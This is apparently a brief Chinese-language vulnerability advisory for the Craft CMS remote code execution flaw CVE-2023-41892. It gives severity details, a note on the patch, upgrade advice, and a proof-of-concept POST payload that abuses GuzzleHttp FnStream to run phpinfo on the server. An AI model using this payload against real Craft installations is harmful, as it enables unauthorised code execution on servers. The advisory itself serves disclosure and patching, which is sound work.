漏洞分析|Craft CMS 远程代码执行漏洞 (CVE-2023-41892)

**

1.概述

Pixel＆tonic Craft CMS 是美国 Pixel＆tonic 公司的一套内容管理系统（CMS）。在 4.4.15 之前的版本中，存在一个远程代码执行漏洞。Craft CMS 是一个用于创建数字体验的平台，这是一个高影响、低复杂性的攻击向量。

2.详细描述

受影响的 Craft CMS 版本存在代码注入漏洞，该漏洞源于远程代码执行漏洞。为了缓解此问题，建议运行 4.4.15 之前版本的用户至少更新到 4.4.15 版本。此问题已在 Craft CMS 4.4.15 中得到修复。

漏洞严重性
CVSS 3.x 严重性和指标:NIST: NVD向量: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

漏洞类型CWE-94
不当控制代码生成（‘代码注入’）

影响范围参考

简单分析
补丁过滤了config参数

将as和on特殊字符过滤了

Poc的post字段

action=conditions/render&test[userCondition]=craft\elements\conditions\users\UserCondition&config={"name":"test[userCondition]","as
      xyz":{"class":"\\GuzzleHttp\\Psr7\\FnStream",    "__construct()": [{"close":null}],"_fn_close":"phpinfo"}}

使用as重置函数到我们指定的函数中导致代码执行

修复和建议用户
应更新至 Craft CMS 4.4.15 或更高版本以缓解此问题。